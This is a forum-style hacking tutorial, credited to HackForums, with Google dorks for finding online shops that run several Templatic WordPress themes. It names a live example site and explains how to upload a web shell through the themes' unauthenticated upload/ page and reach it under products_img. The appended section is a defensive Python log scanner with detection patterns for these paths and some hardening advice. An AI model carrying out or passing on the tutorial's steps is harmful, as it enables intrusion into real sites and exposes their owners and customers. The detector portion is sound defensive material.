WordPress Themes Vulnerable

WordPress Themes Vulnerable to this Exploit:


WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework

Tutorial

1. Go to Google and search for this dork:

"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse

2. Click on any website.

Example:
http://shopshack.net

Right-click and select "View page source".

3. Locate the theme within the source code, which is:

http://shopshack.net/wp-content/themes/framework/

Notice that the theme is /framework/

We have now found a vulnerable theme to test the exploit on.

4. Next, add /upload/ to the end of the URL after /framework/

5. Use the Uploader to upload your shell. (Supports: .php .txt .html)


Shell access:
/wp-content/uploads/products_img/SHELL-NAME-HERE.php

Example:
http://shopshack.net/wp-content/uploads/...mg/dir.php

Another Google dork:

inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=
Credits: HackForums Heart
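
For an administrator of a site running one of these themes, the two paths in the post are the things to look for in web server logs. The following is an added example, not part of the original post: it scans an access log (assumed to be in Apache/Nginx "combined" format) for requests to the theme uploader and for scripts served from products_img. The function name, finding labels and sample log lines are constructed for illustration.

```python
import re

# Theme directories named in the post (compared case-insensitively).
THEMES = ("wpstore", "eshop", "kidzstore", "emporium", "store", "ecommerce", "framework")

# Assumption: Apache/Nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
UPLOADER_RE = re.compile(r"^/wp-content/themes/(?:%s)/upload(?:/|$)" % "|".join(THEMES), re.I)
# Server-side scripts or HTML served out of the product image directory.
DROPPED_RE = re.compile(r"^/wp-content/uploads/products_img/[^/]+\.(?:php\d?|phtml|html?)$", re.I)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/themes/framework/upload/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-content/themes/framework/upload/ HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /wp-content/uploads/products_img/sample.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-content/uploads/products_img/ring.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /wp-content/themes/eShop/upload/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]

def scan_access_log(lines):
    """Return (line_no, client_ip, finding, path) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = m["path"].split("?", 1)[0]      # ignore the query string
        served = m["status"].startswith("2")   # the server answered with content
        if UPLOADER_RE.match(path):
            if m["method"] == "POST":
                findings.append((line_no, m["ip"], "uploader_post", path))
            elif served:
                findings.append((line_no, m["ip"], "uploader_reachable", path))
        elif DROPPED_RE.match(path) and served:
            findings.append((line_no, m["ip"], "script_in_products_img", path))
    return findings

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A hit on either pattern is a reason to take the theme's upload/ directory out of the web root and to disable script execution under wp-content/uploads/.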